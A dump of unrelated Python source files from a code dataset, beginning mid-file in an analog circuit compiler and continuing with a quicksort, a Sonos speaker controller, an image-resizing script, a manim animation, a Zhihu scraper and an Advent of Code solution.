add_parallel_transistor(G1)\n delta = initial_size - len(G1)\n initial_size = len(G1)\n mapped_graph_list = _mapped_graph_list(G1, library, design_setup['POWER']+design_setup['GND'] ,design_setup['CLOCK'], False )\n # reduce graph converts input hierarhical graph to dictionary\n updated_circuit, Grest = reduce_graph(G1, mapped_graph_list,library,check_duplicates,design_setup)\n check_nodes(updated_circuit)\n updated_ckt_list.extend(updated_circuit)\n\n\n stop_points=design_setup['POWER']+design_setup['GND']+design_setup['CLOCK']\n if circuit_name not in design_setup['DIGITAL']:\n symmetry_blocks=FindSymmetry(Grest, circuit[\"ports\"], circuit[\"ports_weight\"], stop_points)\n for symm_blocks in symmetry_blocks.values():\n if isinstance(symm_blocks, dict) and \"graph\" in symm_blocks.keys():\n logger.debug(f\"added new hierarchy: {symm_blocks['name']} {symm_blocks['graph'].nodes()}\")\n updated_ckt_list.append(symm_blocks)\n\n updated_ckt_list.append({\n \"name\": circuit_name,\n \"graph\": Grest,\n \"ports\": circuit[\"ports\"],\n \"ports_weight\": circuit[\"ports_weight\"],\n \"ports_match\": circuit[\"connection\"],\n \"size\": len(Grest.nodes()),\n \"mos_body\":circuit[\"mos_body\"]\n })\n\n lib_names=[lib_ele['name'] for lib_ele in library]\n for lib_name, dupl in check_duplicates.items():\n if len(dupl)>1:\n print(dupl)\n lib_names+=[lib_name+'_type'+str(n) for n in range(len(dupl))]\n return updated_ckt_list, lib_names\n\ndef compiler_output(input_ckt, lib_names , updated_ckt_list, design_name:str, result_dir:pathlib.Path, unit_size_mos=12, unit_size_cap=12):\n \"\"\"\n search for constraints and write output in verilog format\n Parameters\n ----------\n input_ckt : TYPE. input circuit path\n DESCRIPTION.Used to take designer provided constraints\n library : TYPE. list of library graphs used\n DESCRIPTION.\n updated_ckt_list : TYPE. list of reduced circuit graph\n DESCRIPTION. this list is used to generate constraints\n design_name : TYPE. name of top level design\n DESCRIPTION.\n result_dir : TYPE. directoy path for writing results\n DESCRIPTION. writes out a verilog netlist, spice file and constraints\n unit_size_mos : TYPE, Used as parameter for cell generator\n DESCRIPTION. Cells are generated on a uniform grid\n unit_size_cap : TYPE, Used as parameter for cell generator\n DESCRIPTION. The default is 12.\n\n Raises\n ------\n SystemExit: We don't hanadle floating ports in design. They should be removed before hand\n DESCRIPTION.\n\n Returns\n -------\n primitives : Input parmeters for cell generator\n DESCRIPTION.\n\n \"\"\"\n \n if not result_dir.exists():\n result_dir.mkdir()\n logger.debug(f\"Writing results in dir: {result_dir} {updated_ckt_list}\")\n input_dir=input_ckt.parents[0]\n VERILOG_FP = open(result_dir / f'{design_name}.v', 'w')\n printed_mos = []\n logger.debug(\"writing spice file for cell generator\")\n\n ## File pointer for spice generator\n #SP_FP = open(result_dir / (design_name + '_blocks.sp'), 'w')\n print_header(VERILOG_FP, design_name)\n design_setup=read_setup(input_dir / (input_ckt.stem + '.setup'))\n try:\n POWER_PINS = [design_setup['GND'][0],design_setup['POWER'][0]]\n except (IndexError, ValueError):\n POWER_PINS=[]\n logger.error(\"no power and gnd defination, correct setup file\")\n\n #read lef to not write those modules as macros\n lef_path = pathlib.Path(__file__).resolve().parent.parent / 'config'\n ALL_LEF = read_lef(lef_path)\n logger.debug(f\"Available library cells: {', '.join(ALL_LEF)}\")\n # local hack for deisgn vco_dtype,\n #there requirement is different size for nmos and pmos\n if 'vco_dtype_12' in design_name:\n unit_size_mos=37\n generated_module=[]\n primitives = {}\n duplicate_modules =[]\n for member in updated_ckt_list:\n name = member[\"name\"]\n if name in duplicate_modules:\n continue\n else:\n duplicate_modules.append(name)\n logger.debug(f\"Found module: {name}\")\n inoutpin = []\n logger.debug(f'found ports match: {member[\"ports_match\"]}')\n floating_ports=[]\n if member[\"ports_match\"]:\n for key in member[\"ports_match\"].keys():\n if key not in POWER_PINS:\n inoutpin.append(key)\n if member[\"ports\"]:\n logger.debug(f'Found module ports: {member[\"ports\"]} {member.keys()}')\n floating_ports = set(inoutpin) - set(member[\"ports\"]) - set(design_setup['POWER']) -set(design_setup['GND'])\n if 'mos_body' in member:\n floating_ports = floating_ports - set(member[\"mos_body\"])\n\n if len(list(floating_ports))> 0:\n logger.error(f\"floating ports found: {name} {floating_ports}\")\n raise SystemExit('Please remove floating ports')\n else:\n inoutpin = member[\"ports\"]\n\n graph = member[\"graph\"].copy()\n logger.debug(f\"Reading nodes from graph: {graph}\")\n for node, attr in graph.nodes(data=True):\n #lef_name = '_'.join(attr['inst_type'].split('_')[0:-1])\n if 'net' in attr['inst_type']: continue\n #Dropping floating ports\n #if attr['ports'\n lef_name = attr['inst_type'].split('_type')[0]\n if \"values\" in attr and (lef_name in ALL_LEF):\n block_name, block_args = generate_lef(\n lef_name, attr[\"values\"],\n primitives, unit_size_mos, unit_size_cap)\n block_name_ext = block_name.replace(lef_name,'')\n logger.debug(f\"Created new lef for: {block_name}\")\n # Only unit caps are generated\n if block_name.lower().startswith('cap'):\n graph.nodes[node]['inst_type'] = block_args['primitive']\n block_args['primitive']=block_name\n else:\n graph.nodes[node]['inst_type'] = block_name\n\n if block_name in primitives:\n assert block_args == primitives[block_name]\n else:\n primitives[block_name] = block_args\n else:\n logger.info(f\"No physical information found for: {name}\")\n\n\n if name in ALL_LEF:\n logger.debug(f\"writing spice for block: {name}\")\n #ws = WriteSpice(graph, name+block_name_ext, inoutpin, updated_ckt_list, lib_names)\n #ws.print_subckt(SP_FP)\n #ws.print_mos_subckt(SP_FP,printed_mos)\n continue\n\n logger.debug(f\"generated data for {name} : {pprint.pformat(primitives, indent=4)}\")\n if name not in ALL_LEF or name.split('_type')[0] not in ALL_LEF:\n #ws = WriteSpice(graph, name, inoutpin, updated_ckt_list, lib_names)\n #ws.print_subckt(SP_FP)\n #ws.print_mos_subckt(SP_FP,printed_mos)\n\n logger.debug(f\"call verilog writer for block: {name}\")\n wv = WriteVerilog(graph, name, inoutpin, updated_ckt_list, POWER_PINS)\n logger.debug(f\"call array finder for block: {name}\")\n all_array=FindArray(graph, input_dir, name,member[\"ports_weight\"] )\n logger.debug(f\"Copy const file for: {name}\")\n const_file = CopyConstFile(name, input_dir, result_dir)\n logger.debug(f\"cap constraint gen for block: {name}\")\n\n ##Removinf constraints to fix cascoded cmc\n if name not in design_setup['DIGITAL'] and name not in lib_names:\n logger.debug(f\"call constraint generator writer for block: {name}\")\n stop_points=design_setup['POWER']+design_setup['GND']+design_setup['CLOCK']\n WriteConst(graph, result_dir, name, inoutpin, member[\"ports_weight\"],all_array, stop_points)\n WriteCap(graph, result_dir, name, unit_size_cap,all_array)\n check_common_centroid(graph,const_file,inoutpin)\n\n wv.print_module(VERILOG_FP)\n generated_module.append(name)\n if len(POWER_PINS)>0:\n print_globals(VERILOG_FP,POWER_PINS)\n #SP_FP.close()\n\n logger.info(\"Topology identification done !!!\")\n logger.info(f\"OUTPUT verilog netlist at: {result_dir}/{design_name}.v\")\n #logger.info(f\"OUTPUT spice netlist at: {result_dir}/{design_name}_blocks.sp\")\n logger.info(f\"OUTPUT const file at: {result_dir}/{design_name}.const\")\n print(\"compilation stage done\")\n return primitives\n","sub_path":"align/compiler/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":12931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"471258067","text":"def slicing(string):\n left, right = 0, 0\n u, v = '', ''\n for i in range(len(string)):\n if string[i] == '(':\n left += 1\n else:\n right += 1\n if left != 0 and right != 0 and left == right:\n u = string[0: i + 1]\n v = string[i + 1:]\n break\n return u, v\n\n\ndef is_right(string):\n stack = []\n for i in string:\n if i == '(':\n stack.append(i)\n else:\n if len(stack) == 0:\n return False\n stack.pop()\n return False if stack else True\n\n\ndef solution(string):\n answer = []\n # 빈 문자열이거나 전체가 올바른 괄호 문자열이면 그대로 반환\n if string == '' or is_right(string):\n return string\n\n # 문자열을 균형 잡힌 괄호 문자열로 분리\n u, v = slicing(string)\n\n # u가 올바른 괄호 문자열이라면\n if is_right(u):\n next_v = solution(v)\n return u + next_v\n\n # u가 올바른 괄호 문자열이 아닌 경우\n else:\n # 첫번째 (\n answer += '('\n # 두번째 v를 재귀적으로 실행한 결과\n answer += solution(v)\n # 세번째 )\n answer += ')'\n # 네번째 u의 앞뒷문자 제거\n u = u[1:-1]\n # u는 균형잡힌 문자열임으로 길이의 반만큼 rotate하면 반전됨\n # 위처럼 하니까 틀림.. 하나씩 바꾸어줌\n new_u = ''\n for i in range(len(u)):\n if u[i] == '(':\n new_u += ')'\n else:\n new_u += '('\n answer += new_u\n return str(''.join(answer))","sub_path":"Simulation/괄호 변환_old.py","file_name":"괄호 변환_old.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"196592035","text":"#quick3\r\nimport time\r\nfrom time import sleep\r\n\r\ndef find_pivot(nlist,low,high):\r\n mid = (low+high)//2\r\n if nlist[low]<=nlist[mid]:\r\n if nlist[mid]<=nlist[high]:\r\n pivot = nlist[mid]\r\n temp = nlist[mid]\r\n nlist[mid] = nlist[high]\r\n nlist[high] = temp\r\n elif nlist[mid] > nlist[high]:\r\n if nlist[high] > nlist[low]:\r\n pivot = nlist[high]\r\n else:\r\n pivot = nlist[low]\r\n temp = nlist[low]\r\n nlist[low] = nlist[high]\r\n nlist[high] = temp\r\n else:\r\n if nlist[mid] > nlist[high]:\r\n pivot = nlist[mid]\r\n temp = nlist[mid]\r\n nlist[mid] = nlist[low]\r\n nlist[low] = nlist[high]\r\n nlist[high] = temp\r\n elif nlist[high] > nlist[mid]:\r\n if nlist[high] <= nlist[low]: \r\n pivot = nlist[high]\r\n temp = nlist[low]\r\n nlist[low] = nlist[mid]\r\n nlist[mid] = temp\r\n else:\r\n pivot = nlist[low]\r\n temp = nlist[high]\r\n nlist[high] = nlist[low]\r\n nlist[low] = nlist[mid]\r\n nlist[mid] = temp\r\n return pivot\r\n\r\ndef partition(nlist,low,high):\r\n pivot = find_pivot(nlist,low,high)\r\n first = low-1\r\n for i in range(low,high):\r\n if nlist[i]<=pivot:\r\n first = first + 1\r\n temp = nlist[first]\r\n nlist[first] = nlist[i]\r\n nlist[i] = temp\r\n temp = nlist[first+1]\r\n nlist[first+1] = nlist[high]\r\n nlist[high] = temp\t\r\n return first+1\r\n\r\ndef quicksortmed(nlist,low,high):\r\n start_time = time.time()\r\n if low= 2:\n print('[Balancing] Sonos speaker {} removed after missing {} discovery cycles'.format(speaker.name, speaker.times_discovery_missed))\n await self.config.speaker_repository.remove_speaker(speaker.speaker_id, delete_from_runtime_store=True)\n\n await asyncio.sleep(15)\n\n def stop_discover_loop(self):\n \"\"\"Sets the flag to stop the discover loop\"\"\"\n self.discover_loop_exiting = True\n\n async def control_loop(self):\n \"\"\"Starts the control loop which consumes all control commands in the queue\"\"\"\n self.control_loop_exiting = False\n while not self.control_loop_exiting:\n command: SonosCommand = await self.control_queue.get()\n command.run(self.sonos_adapter)\n self.control_queue.task_done()\n\n def stop_control_loop(self):\n \"\"\"Sets the flag to stop the control loop\"\"\"\n self.control_loop_exiting = True\n\n def send_command(self, command: SonosCommand):\n \"\"\"Adds the command to the control queue\"\"\"\n self.control_queue.put_nowait(command)\n","sub_path":"backend/src/balancing/sonos.py","file_name":"sonos.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"306989666","text":"import cv2\nimport glob\n\n\ndef align_sizes(path_1, path_2):\n img1 = cv2.imread(path_1)\n img2 = cv2.imread(path_2)\n\n if (img1 is None or img2 is None):\n return\n elif (img1.shape[0] == img1.shape[1] and img2.shape[0] == img2.shape[1]\n and img1.shape[0] == img2.shape[0] and img1.shape[1] == img2.shape[1]):\n # artificial early return for speeding up process.\n return\n else:\n img1 = _assure_square(img1)\n img2 = _assure_square(img2)\n\n if (img1.shape[0] > img2.shape[0]):\n img1 = cv2.resize(img1, (img2.shape[0], img2.shape[1]))\n elif (img2.shape[0] > img1.shape[0]):\n img2 = cv2.resize(img2, (img1.shape[0], img1.shape[1]))\n\n cv2.imwrite(path_1, img1)\n cv2.imwrite(path_2, img2)\n\n\ndef _assure_square(img):\n if (img.shape[0] > img.shape[1]):\n return cv2.resize(img, (img.shape[0], img.shape[0]))\n elif (img.shape[1] > img.shape[0]):\n return cv2.resize(img, (img.shape[1], img.shape[1]))\n else:\n return img\n\n\nfiles = glob.glob('./*.jpg')\nfiles = sorted(files)\n\nprint(files)\n\nfor i in range(0, int(len(files) / 2)):\n from_index = i * 2\n to_index = from_index + 1\n\n first = files[from_index]\n second = files[to_index]\n\n if (first[0:20] != second[0:20]):\n print(first)\n print(second)\n raise \"files must match\"\n\nfor i in range(0, int(len(files) / 2)):\n from_index = i * 2\n to_index = from_index + 1\n\n first = files[from_index]\n second = files[to_index]\n\n align_sizes(first, second)\n","sub_path":"preprocess/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"240726054","text":"from manimlib.imports import *\r\n\r\nclass Examples(GraphScene):\r\n def construct(self):\r\n \r\n rectangle = Rectangle(height = 3, width = 4, color = GREEN)\r\n square = Square(side_length = 5, color = PURPLE)\r\n circle = Circle(radius = 2, color = PINK)\r\n radius = Line(ORIGIN,2*RIGHT)\r\n \r\n radius.set_color(RED)\r\n\r\n rectangle_area_func = TextMobject(r\"$Area = f(Length, Breadth)$\")\r\n rectangle_area_func.scale(0.6)\r\n square_area_func = TextMobject(r\"$Area = f(Length)$\")\r\n circle_area_func = TextMobject(r\"$Area = f(r)$\")\r\n\r\n\r\n rectangle_area = TextMobject(r\"$Area = Length \\times Breadth$\")\r\n rectangle_area.scale(0.6)\r\n square_area = TextMobject(r\"$Area = Length^2$\")\r\n circle_area = TextMobject(r\"$Area = \\pi r^2$\")\r\n\r\n braces_rect1 = Brace(rectangle, LEFT)\r\n eq_text1 = braces_rect1.get_text(\"Length\")\r\n braces_rect2 = Brace(rectangle, UP)\r\n eq_text2 = braces_rect2.get_text(\"Breadth\")\r\n\r\n braces_square = Brace(square, LEFT)\r\n braces_square_text = braces_square.get_text(\"Length\")\r\n\r\n radius_text = TextMobject(\"r\")\r\n radius_text.next_to(radius,UP)\r\n\r\n \r\n\r\n self.play(ShowCreation(rectangle))\r\n self.wait(1)\r\n self.play(GrowFromCenter(braces_rect1),Write(eq_text1),GrowFromCenter(braces_rect2),Write(eq_text2))\r\n self.wait(1)\r\n self.play(Write(rectangle_area_func))\r\n self.wait(1)\r\n self.play(Transform(rectangle_area_func, rectangle_area))\r\n self.wait(1)\r\n self.play(FadeOut(braces_rect1),FadeOut(eq_text1),FadeOut(braces_rect2),FadeOut(eq_text2),FadeOut(rectangle_area_func))\r\n\r\n\r\n self.play(Transform(rectangle, square))\r\n self.wait(1)\r\n self.play(GrowFromCenter(braces_square),Write(braces_square_text))\r\n self.wait(1)\r\n self.play(Write(square_area_func))\r\n self.wait(1)\r\n self.play(Transform(square_area_func, square_area))\r\n self.wait(1)\r\n self.play(FadeOut(braces_square),FadeOut(braces_square_text),FadeOut(square_area_func))\r\n\r\n\r\n self.play(Transform(rectangle, circle))\r\n self.wait(1)\r\n self.play(ShowCreation(radius),Write(radius_text))\r\n self.wait(1)\r\n self.play(FadeOut(radius_text),FadeOut(radius))\r\n self.wait(1)\r\n self.play(Write(circle_area_func))\r\n self.wait(1)\r\n self.play(Transform(circle_area_func, circle_area))\r\n self.wait(1)\r\n self.play(FadeOut(circle_area_func))","sub_path":"FSF-2020/calculus-of-several-variables/multivariable-functions-and-paritial-derivatives/Multivariable Functions/multivariable_func_examples.py","file_name":"multivariable_func_examples.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96304332","text":"from concurrent.futures import ThreadPoolExecutor\nfrom queue import Queue\n\nfrom beans.people import TopicBestAnswererDetail\nfrom captcha import *\nfrom db import DB\nfrom utils import *\nfrom zhihu import *\n\nlogger = get_common_logger(__file__, \"topic_best_answerer_detail.log\")\n\n\n# noinspection PyBroadException\ndef handle_output(output):\n db = DB()\n sql = TopicBestAnswererDetail.insert_sql()\n count = 0\n while True:\n try:\n answerer = output.get()\n db.execute(sql, tuple(answerer))\n count += 1\n logger.debug(\"Insert topic best answerer detail:%s. Count:%s\", answerer, count)\n except BaseException:\n logger.fatal(\"Handle output unexpected error.\", exc_info=True)\n\n\n# noinspection PyBroadException\ndef get_people_detail(pid, output, cs):\n try:\n while True:\n cs.wait_until_clear()\n\n resp = ZhihuClient.people_detail(pid)\n if not resp.success:\n if resp.client_error_resource_not_found():\n logger.warning(\"Resource not found. id:%s\", pid)\n break\n elif resp.client_error_forbidden():\n # ask for killing captcha\n cs.help()\n continue\n elif resp.client_error_user_be_baned():\n logger.warning(\"User be baned. id:%s\", pid)\n break\n else:\n logger.warning(\"Other error. id:%s\", pid)\n continue\n\n detail = resp.data\n output.put(TopicBestAnswererDetail.from_dict(detail))\n break\n except BaseException:\n logger.fatal(\"Get people:%s detail unexpected error.\", pid, exc_info=True)\n\n\ndef dispatch():\n todo = Queue()\n output = Queue()\n cs = CaptchaService()\n\n db = DB()\n sql = \"select distinct(id) from topic_best_answerer\"\n for row in db.execute(sql):\n todo.put(row[0])\n logger.info(\"Todo size:%s\", todo.qsize())\n\n cs.start()\n with ThreadPoolExecutor(max_workers=50) as executor:\n # 一个专门线程处理输出\n executor.submit(handle_output, output)\n\n while not todo.empty():\n pid = todo.get()\n executor.submit(get_people_detail, pid, output, cs)\n\n\nif __name__ == '__main__':\n dispatch()\n","sub_path":"spiders/topic_best_answerer_detail.py","file_name":"topic_best_answerer_detail.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"358036605","text":"# List comprehensions\n# https://www.reddit.com/r/adventofcode/comments/e5u5fv/2019_day_4_solutions/\n\nlo, hi = 145852, 616942\n\n# Part 1\nstrings = [str(s) for s in range(lo, hi+1)]\nnodecrs = [s for s in strings if s == ''.join(sorted(list(s)))]\n# print len(nodecrs)\n\nrepeats = [str(i)*2 for i in range(10)]\n# print repeats\n\nresults = [s for s in nodecrs if any(d in s for d in repeats)]\nprint(\"Part 1:\",len(results))\n\n# Part 2\nlo , hi = 145852 , 616942\nstrings = [str(s) for s in range(lo, hi + 1)]\nnodecrs = [s for s in strings if s == ''.join(sorted(list(s)))]\nrepeats = [(str(i) * 2, str(i) * 3) for i in range(10)]\nresults = [s for s in nodecrs if any(d in s and not t in s for d, t in repeats)]\nprint(\"Part 2:\",len(results))\n","sub_path":"2019/day4_cheat.py","file_name":"day4_cheat.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}